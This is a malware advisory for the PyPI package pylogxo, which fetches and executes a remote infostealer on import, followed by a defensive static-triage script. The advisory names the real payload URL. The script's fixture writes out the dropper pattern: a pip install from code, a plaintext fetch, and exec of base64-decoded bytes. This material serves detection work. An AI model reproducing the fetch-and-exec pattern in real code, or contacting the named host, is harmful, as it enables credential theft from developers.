Vulnerability
Malicious code in pylogxo (PyPI)
## Source: amazon-inspector (bbeee018f429f5a978b85aa3999c8e24251a85dc787b1e4fd673abcabf157800)

On `import pylogx`, the package spawns a background thread that sleeps 5-20 seconds, force-installs sensitive third-party packages (cryptography, pycryptodomex, secretstorage, opencv-python, pillow, psutil) via pip, then fetches a base64-encoded blob from http://69.164.245.166/payload.txt over plaintext HTTP and passes the decoded bytes to `exec()` with a synthetic `__name__ = "__payload__"`. The destination is a bare IP with no TLS, no pinning, and no signature verification, so any code the operator of that host serves runs in the importing process. The pre-installed dependency set (secretstorage + cryptography) is consistent with a follow-on credential / keyring harvester.

The package is also distributed under the name `pylogxo` while installing the import name `pylogx` — a near-edit of legitimate logging library names — and ships placeholder metadata (empty README, `https://github.com/example/pylogx`, `support@pylogx.example`) and references submodules (`formatter`, `handlers`) that do not exist in the tarball, so the module will raise ImportError only after the dropper thread has already fired. There is no legitimate reason for a logging utility to fetch and execute remote code at import time.

## Source: kam193 (7ccb3e3a1ccde821415d6be9c25d123cc1ebedea4ca6dd40d77fc24e01cd0aaa)

During import, the package downloads and executes remote code that is an infostealer.

---

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-pylogxo

Reasons (based on the campaign):

- Downloads and executes a remote malicious script.
- infostealer
- The package contains code to detect if it is running in a sandbox environment.
- exfiltration-credentials
- exfiltration-browser-data
- files-exfiltration
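The indicators the sources list (a thread started at import, pip driven from code, a plaintext `http://` fetch, `exec()` of base64-decoded data, a distribution name that differs from the import name, and submodules referenced but absent from the archive) can be checked statically before a package is ever imported. The script below is an added example written for this advisory, not code from either source or from the package; it parses source text with Python's `ast` module and never executes it. The `SUSPICIOUS` and `BENIGN` fixtures are constructed to mirror the shape described above (the fixture uses the documentation address 203.0.113.10 and no real payload), and the archive file lists passed to `missing_submodules` are likewise invented for the demonstration.

```python
"""Static triage of a Python package for import-time dropper indicators.

Added example: inspects source text with `ast` only; nothing here imports
or runs the package under review.
"""
import ast
import re
from typing import Dict, List, Set


def _dotted(node: ast.AST) -> str:
    """Return 'a.b.c' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def _words(node: ast.AST) -> List[str]:
    """All string constants under `node`, split on whitespace."""
    return [w for n in ast.walk(node)
            if isinstance(n, ast.Constant) and isinstance(n.value, str)
            for w in n.value.split()]


def find_indicators(source: str) -> List[str]:
    """Sorted indicator names found in one module's source text."""
    tree = ast.parse(source)
    found: Set[str] = set()
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        callee = _dotted(node.func)
        # exec()/eval() whose argument passes through a b64decode call
        if callee in ("exec", "eval"):
            for inner in ast.walk(node):
                if isinstance(inner, ast.Call) and _dotted(inner.func).endswith("b64decode"):
                    found.add("exec_of_base64_payload")
        # a fetch from a plaintext http:// URL
        if callee.split(".")[-1] in ("urlopen", "urlretrieve", "get", "request"):
            if any(w.startswith("http://") for w in _words(node)):
                found.add("plaintext_http_fetch")
        # pip driven from code, via subprocess or os.system
        if callee.startswith("subprocess.") or callee == "os.system":
            words = _words(node)
            if "pip" in words and "install" in words:
                found.add("pip_install_from_code")
    # a `.start()` call as a statement at module scope runs on import
    for stmt in tree.body:
        if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Call):
            func = stmt.value.func
            if isinstance(func, ast.Attribute) and func.attr == "start":
                found.add("thread_started_on_import")
    return sorted(found)


def missing_submodules(package: str, source: str, files_in_archive: Set[str]) -> List[str]:
    """Submodules the source imports from `package` that the archive does not contain."""
    wanted: Set[str] = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ImportFrom) and node.level == 1:
            if node.module:
                wanted.add(node.module.split(".")[0])
            else:  # `from . import x`
                wanted.update(alias.name for alias in node.names)
        elif isinstance(node, ast.Import):
            for alias in node.names:
                head, _, rest = alias.name.partition(".")
                if head == package and rest:
                    wanted.add(rest.split(".")[0])
    return sorted(m for m in wanted
                  if f"{package}/{m}.py" not in files_in_archive
                  and f"{package}/{m}/__init__.py" not in files_in_archive)


def import_name_mismatch(distribution: str, top_level: str) -> bool:
    """True when the PyPI distribution name and the import name differ after normalization."""
    norm = lambda s: re.sub(r"[-_.]+", "-", s).lower()
    return norm(distribution) != norm(top_level)


def triage(distribution: str, package: str, source: str, files: Set[str]) -> Dict[str, object]:
    """Combine the three checks into one report for a package archive."""
    return {
        "indicators": find_indicators(source),
        "missing_submodules": missing_submodules(package, source, files),
        "name_mismatch": import_name_mismatch(distribution, package),
    }


# Constructed fixture: the shape of the pattern described in the advisory,
# with the documentation address 203.0.113.10 and no payload. Parsed only.
SUSPICIOUS = '''
import base64, subprocess, sys, threading, urllib.request
from .formatter import fmt

def _prepare():
    subprocess.check_call([sys.executable, "-m", "pip", "install", "secretstorage"])

def _fetch():
    return urllib.request.urlopen("http://203.0.113.10/payload.txt").read()

def _run(blob):
    exec(base64.b64decode(blob), {"__name__": "__payload__"})

threading.Thread(target=_prepare, daemon=True).start()
'''

# Constructed fixture: an ordinary logging helper for comparison.
BENIGN = '''
import logging
from .handlers import JsonHandler

def get_logger(name):
    return logging.getLogger(name)
'''

if __name__ == "__main__":
    print(triage("pylogxo", "pylogx", SUSPICIOUS, {"pylogx/__init__.py"}))
    print(triage("pylogx", "pylogx", BENIGN, {"pylogx/__init__.py", "pylogx/handlers.py"}))
```

Run against an unpacked sdist, `triage()` gives a quick yes/no on each of the advisory's structural tells; a hit on `thread_started_on_import` together with `plaintext_http_fetch` or `exec_of_base64_payload` is enough to hold a package for manual review without ever importing it.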
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
No exploitation, limited impact or prevalence